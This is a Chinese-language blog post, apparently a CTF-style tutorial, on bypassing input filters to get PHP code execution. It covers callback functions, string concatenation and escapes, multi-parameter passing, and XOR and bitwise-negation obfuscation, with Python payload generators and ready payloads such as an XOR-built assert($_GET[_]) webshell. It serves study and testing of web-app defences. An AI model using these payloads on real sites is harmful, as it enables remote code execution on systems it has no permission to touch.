php绕过姿势

代码执行函数绕过

eval、assert、system、passthru

正则

preg_replace ($pattern ,  $replacement , $subject )

​ $pattern为正则表达式

​ $replacement为替换字符串

​ $subject 为要搜索替换的目标字符串或字符串数组

正则表达式\(pattern以/e结尾时\)replacement的值会被作为php函数执行。

例如执行 preg_replace (‘/test/e’ , "phpinfo();" , "test" )“test”会被替换为phpinfo();并执行。

PS: preg_replace()+函数的/e修饰符在PHP7中被移除

image-20210317111148820

create_function ($args ,$code ) //创建一个匿名(lambda样式)函数

创建一个匿名函数,并为其返回唯一的名称。如果没有严格对参数传递进行过滤,攻击者可以构造payload传递给create_function()参数或函数体闭合注入恶意代码导致代码执行。

image-20210317111951154

array_map ($callback,$array,array ...$arrays )//为数组的每个元素应用回调函数

​ 返回数组,是为array每个元素应用callback函数之后的数组。 array_map()返回一个array,数组内容为array1的元素按索引顺序为参数调用callback后的结果(有更多数组时,还会传入arrays的元素)。 callback函数形参的数量必须匹配array_map()实参中数组的数量。

image-20210317141600012

call_user_func ( callable $callback [, mixed $parameter [, mixed $... ]] ) : mixed //第一个参数作为回调函数调用

image-20210317141830125

call_user_func_array ( callable $callback , array $param_arr ) : mixed //调用回调函数,并把一个数组参数作为回调函数的参数

把第一个参数作为回调函数callback调用,把参数数组作param_arr为回调函数的的参数传入。跟array_map()相似

image-20210317141930772

array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) : array //用回调函数过滤数组中的单元

依次将array数组中的每个值传递到callback函数。如果callback函数返回true,则array数组的当前值会被包含在返回的结果数组中。数组的键名保留不变。

image-20210317142112195

usort ( array &$array , callable $value_compare_func ) : bool //使用用户自定义的比较函数对数组中的值进行排序

本函数将用用户自定义的比较函数对一个数组中的值进行排序。 如果要排序的数组需要用一种不寻常的标准进行排序,那么应该使用此函数.

image-20210317142244786

image-20210317142257448

字符串拼接绕过

php >= 7
(p.h.p.i.n.f.o)();
(sy.(st).em)(whoami);
(sy.(st).em)(who.ami);
(s.y.s.t.e.m)("whoami");

image-20210317142621184

字符串转义绕过

php >= 7

以八进制表示的\[0–7]{1,3}转义字符会自动适配byte(如"\400" == “\000”
以十六进制的\x[0–9A-Fa-f]{1,2}转义字符表示法(如“\x41"
以Unicode表示的\u{[0–9A-Fa-f]+}字符,会输出为UTF-8字符串

"\x70\x68\x70\x69\x6e\x66\x6f"();#phpinfo();
"\163\171\163\164\145\155"('whoami');#system('whoami');
"\u{73}\u{79}\u{73}\u{74}\u{65}\u{6d}"('id');#system('whoami');
"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');

image-20210317142905989

image-20210317142928717

image-20210317143010610

"\163\171\163\164\145\155"("\167\150\157\141\155\151");#system('whoami');
//八进制的方法可以绕过无字母传参进行代码执行

image-20210317143126833

多次传参绕过

无限制版本

过滤了引号(单引号/双引号)

image-20210317143250083

GET:
?1=system&2=whoami
POST:
cmd=$_GET[1]($_GET[2]);


cmd=$_POST[1]($_POST[2]);&1=system&2=whoami

image-20210317143353401

如果PHP版本大于7这里还可以用拼接的方法绕过过滤引号

(sy.st.em)(whoami);

如果碰到参数长度受限制,也可以通过多次传参的方法绕过参数长度限制或者回调函数

image-20210317143610259

回调函数可能大部分看限制的具体长度,但是在PHP >= 5.6 & PHP < 7时对以上过滤方法可以绕过

image-20210317143812651

内置函数访问绕过

get_defined_functions()://返回所有已定义函数的数组

image-20210317143945548

image-20210317144055505

异或绕过

在PHP中两个字符串异或之后,得到的还是一个字符串。
例如:我们异或 ?~ 之后得到的是 A

图一

字符:?         ASCII码:63           二进制:  00‭11 1111‬
字符:~         ASCII码:126          二进制:  0111 1110‬
异或规则:
1   XOR   0   =   1
0   XOR   1   =   1
0   XOR   0   =   0
1   XOR   1   =   0
上述两个字符异或得到 二进制:  0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A

image-20210317144213729

过滤了所有英文字母和数字,但是我们知道ASCII码中还有很多字母数字之外的字符,利用这些字符进行异或可以得到我们想要的字符

PS:取ASCII表种非字母数字的其他字符,要注意有些字符可能会影响整个语句执行,所以要去掉如:反引号,单引号

# -*- coding: utf-8 -*-

payload = "assert"
strlist = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 35, 36, 37, 38, 40, 41, 42, 43, 44, 45, 46, 47, 58, 59, 60, 61, 62, 63, 64, 91, 93, 94, 95, 96, 123, 124, 125, 126, 127]
#strlist是ascii表中所有非字母数字的字符十进制
str1,str2 = '',''

for char in payload:
    for i in strlist:
        for j in strlist:
            if(i ^ j == ord(char)):
                i = '%{:0>2}'.format(hex(i)[2:])
                j = '%{:0>2}'.format(hex(j)[2:])
                print("('{0}'^'{1}')".format(i,j),end=".")
                break
        else:
            continue
        break

一次代码执行只能得到我们想要执行语句的字符串,并不能执行语句,所以需要执行两次代码执行,构造

assert($_GET[_]);

使用脚本对每个字母进行转换,然后拼接

$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');
//$_='assert';
$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');
//$__='_GET';
$___=$$__;
//$___='$_GET';
$_($___[_]);
//assert($_GET[_]);

payload

$_=('%01'^'%60').('%08'^'%7b').('%08'^'%7b').('%05'^'%60').('%09'^'%7b').('%08'^'%7c');$__='_'.('%07'^'%40').('%05'^'%40').('%09'^'%5d');$___=$$__;$_($___[_]);&_=phpinfo();

在这里插入图片描述

经本地测试,发现这种方法可以在php5以及php7.0.9版本种使用,因为assert()的问题,并不是异或不能使用
注:PHP5低版本有些可能因为magic_quotes_gpc开启的关系导致无法利用

在这里插入图片描述

当过滤字符的范围没有那么大,或者只是过滤关键字的时候可以使用如下脚本

# -*- coding: utf-8 -*-
import string

char = string.printable
cmd = 'system'
tmp1,tmp2 = '',''
for res in cmd:
    for i in char:
        for j in char:
            if(ord(i)^ord(j) == ord(res)):
                tmp1 += i
                tmp2 += j
                break
        else:
            continue
        break
print("('{}'^'{}')".format(tmp1,tmp2))

image-20210317144529065

在这里插入图片描述

Payload

${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
//${_GET}{%ff}();&%ff=phpinfo

URL编码取反绕过

PHP>=7时,可以直接利用取反构造payload

image-20210317144919732

(~%8F%97%8F%96%91%99%90)();
#phpinfo();

在这里插入图片描述

image-20210317145010564

(~%8C%86%8C%8B%9A%92)(~%88%97%90%9E%92%96);
#system('whoami');

在这里插入图片描述

5<=PHP<=7.0.9时,需要再执行一次构造出来的字符,所以参考上面那种异或拼接的方法

$_=(~'%9E%8C%8C%9A%8D%8B');$__='_'.(~'%AF%B0%AC%AB');$___=$$__;$_($___[_]);
#assert($_GET[_]);

在这里插入图片描述

posted @ 2022-06-13 09:49  Rlins  阅读(982)  评论(0)    收藏  举报